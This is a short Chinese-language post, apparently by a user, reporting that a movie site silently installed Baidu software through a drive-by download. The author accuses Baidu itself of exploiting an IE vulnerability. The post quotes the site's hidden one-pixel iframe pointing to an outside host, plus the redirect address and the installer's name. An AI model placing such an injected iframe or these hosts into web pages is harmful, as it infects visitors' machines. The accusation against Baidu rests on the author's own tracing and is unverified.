今天上网看片,搜到一个影音站,结果片子半天没有缓冲出来,电脑先卡得要死。没过一会儿,突然发现桌面右下角冒出几个图标,不知怎么就装上了百度杀毒、百度卫士之类的。
我第一反应就是这个网站有问题,赶紧查了下页面的源代码http://www.80ydw.com/movie/693.html,果然有处很可疑:<iframesrc=http://hpa.pw/HHHwidth=1height=1></iframe>,明显是被挂马了:
进一步分析,http://hpa.pw/HHH这个页面会跳转到http://221.233.160.110/images/xml.html,懂行的一看都知道了,它就是利用微软11月刚补的IE漏洞挂马(我电脑是XP系统直接中招),挂的竟然是一个百度官方签名的安装包,下载地址也是在百度服务器!
再看百度利用IE漏洞偷偷安装的这个安装包,文件名是BaiduYouQianPartPackSilent_1.1.0.10_150946.exe,大小竟然有144MB!当它利用漏洞自动下载执行后,会给电脑里装上百度杀毒、百度卫士、百度浏览器和百度输入法等一窝垃圾,难怪电脑都快卡死机了。
互联网公司流氓推广见得多了,但好歹最多就是诱导性的弹窗,而百度所谓的杀毒软件,竟然像病毒一样攻击用户的系统漏洞,真是连底裤都不要了。 |
